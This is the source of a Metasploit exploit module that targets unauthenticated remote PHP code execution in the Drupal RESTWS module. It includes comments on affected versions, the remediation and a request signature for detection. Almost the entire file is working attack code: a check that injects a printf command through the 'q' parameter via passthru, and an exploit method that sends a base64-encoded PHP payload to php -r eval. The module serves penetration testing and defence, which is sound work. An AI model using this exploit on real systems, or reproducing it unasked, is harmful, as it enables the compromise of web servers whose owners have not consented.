rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/unix/webapp/drupal_restws_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
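# Metasploit module for the Drupal RESTWS remote PHP code execution issue
# referenced at https://www.drupal.org/node/2765567.
#
# Per the module description, RESTWS 2.x prior to 2.6 and 1.x prior to 1.7 are
# affected, so upgrading RESTWS to 2.6 / 1.7 or later is the remediation.
#
# Detection note: both #check and #exploit issue a GET to index.php whose `q`
# parameter starts with `taxonomy_vocabulary//passthru/`. Where query strings
# are logged, that prefix is the request signature this module produces.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  # Registers module metadata and the TARGETURI option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Drupal RESTWS Module Remote PHP Code Execution',
        'Description' => %q{
          This module exploits a Remote PHP Code Execution vulnerability in the
          Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
          under the context of the web server user.

          RESTWS alters the default page callbacks for entities to provide
          additional functionality. A vulnerability in this approach allows
          an unauthenticated attacker to send specially crafted requests resulting
          in arbitrary PHP execution. RESTWS 2.x prior to 2.6 and 1.x prior to 1.7
          are affected by this issue.

          This module was tested against RESTWS 2.5 with Drupal 7.5 installed on
          Ubuntu Server.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Devin Zuczek', # discovery
          'Mehmet Ince <[email protected]>' # msf module
        ],
        'References' => [
          ['URL', 'https://www.drupal.org/node/2765567']
        ],
        'Privileged' => false,
        'Payload' => {
          'DisableNops' => true
        },
        'Platform' => ['php'],
        'Arch' => ARCH_PHP,
        'Targets' => [ ['Automatic', {}] ],
        'DisclosureDate' => '2016-07-13',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The target URI of the Drupal installation', '/'])
      ]
    )
  end

  # Probes the target by asking it to print a random marker.
  #
  # This is not a passive check: the request causes `printf` to run on a
  # vulnerable server. The marker is sent octal-escaped, so a response that
  # merely echoes the request back would not contain the plain-text marker.
  #
  # @return [Exploit::CheckCode] Vulnerable when the marker is in the response
  #   body, Safe when a response arrived without it, Unknown when no response
  #   was received at all.
  def check
    r = rand_text_alpha(8 + rand(4))

    res = send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        'q' => "taxonomy_vocabulary//passthru/printf '#{Rex::Text.to_octal(r)}'"
      }
    )

    # A missing response (timeout, connection failure) says nothing about the
    # target; reporting Safe here would be a false negative.
    return Exploit::CheckCode::Unknown unless res

    if res.body.include?(r)
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  # Delivers the configured PHP payload through the same `q` parameter path
  # used by #check. The payload is base64-wrapped and handed to `php -r`.
  # The HTTP response is not inspected.
  def exploit
    cmd = "php -r 'eval(base64_decode(\"#{Rex::Text.encode_base64(payload.encoded)}\"));'"

    send_request_cgi(
      'method' => 'GET',
      'uri' => normalize_uri(target_uri.path, 'index.php'),
      'vars_get' => {
        'q' => "taxonomy_vocabulary//passthru/#{cmd}"
      }
    )
  end
end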